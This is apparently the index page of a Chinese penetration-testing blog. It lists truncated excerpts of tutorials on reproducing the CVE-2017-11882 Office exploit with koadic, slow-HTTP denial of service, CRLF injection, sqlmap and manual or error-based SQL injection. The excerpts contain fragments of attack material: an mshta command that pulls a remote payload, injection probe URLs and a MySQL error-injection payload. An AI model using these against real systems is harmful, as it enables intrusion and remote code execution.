22 CVE-2017-11882复现配合koadic

admin     2017.11.22     渗透测试     抢沙发     376人打酱油
项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshtahttp://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[[email protected]]...

20 缓慢的Http拒绝服务攻击漏洞的验证(slowhttptest的安装)

admin     2017.11.20     渗透测试     抢沙发     167人打酱油
0x01前言 主要记录缓慢的Http拒绝服务攻击漏洞的验证过程。 0x02什么是Http拒绝服务攻击? 缓慢的http拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量httprequest攻击,直到服务器带宽被打...

20 CRLF注射教程

admin     2017.11.20     渗透测试     抢沙发     165人打酱油
CRLF注射剂定义 CRLF指特殊字符元素“回车”和“换行”。这些元素嵌入在HTTP头文件和其他软件代码中,以表示行尾(EOL)标记。许多互联网协议,包括MIME(电子邮件),NNTP(新闻组),更重要的是HTTP,使用CRLF序列将文本流分离成离散的元素。Web应用程序开发人员根...

20 sqlmap注入burp日志

admin     2017.11.20     工具教程     抢沙发     118人打酱油
在sqlmap之前我们肯定需要先生成一份burp浏览过网站的日志并进行本地保存,这里需要先本地配置burp 选择后我们选择默认保存路径。 二。sqlmap扫描burp日志 命令行:sqlmap.py-lburp日志文件的位置--batch-smar...

20 access手工sql注入基础

admin     2017.11.20     渗透测试     抢沙发     135人打酱油
判断注入 Orderby2222代表查询的列名的数目有22个 http://127.0.0.1/test.asp?id=xxorderby22正常(小于等于22均正常) http://127.0.0.1/test.asp?id=xxorderby23错误 猜解表名确定存在admin表名 ht...

20 在代理环境下使用sqlmap

admin     2017.11.20     工具教程     抢沙发     120人打酱油
在sqlmap手册里,关于代理讲的并不是太详细。因为这两天正好遇到了,所以写篇科普文。 目标: 使用sqlmap在代理(包括tor)环境下进行注入。 环境: kalilinux2.0 安装: python sqlmap 注意:国内因为网络环境的原因,有时候连不上github.com的服务器。 ...

20 NMAP工具的script脚本讲解

admin     2017.11.20     工具教程     抢沙发     205人打酱油
1.script脚本路径 %nmap%/scripts目录下所有的nse脚本文件 2.脚本分类 auth 负责处理鉴权证书(绕开鉴权)的脚本 broadcast 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute 提供暴力破解方式,针对常见的应用如ht...

20 mysql报错注入(显错注入)整理

admin     2017.11.20     数据库     抢沙发     203人打酱油
1、通过floor暴错 /*数据库版本*/ and(select1from(selectcount(*),concat((select(select(selectconcat(0x7e,version(),0x7e)))frominformation_schema.tableslimit0,1...

20 一路普及计划

admin     2017.11.20     未分类     抢沙发     154人打酱油
没想过改变什么,没想过能改变啥,但是突发奇想,或许可以做些己所能及的事。 站点普及技术基础,细节。望多交流 ...

关闭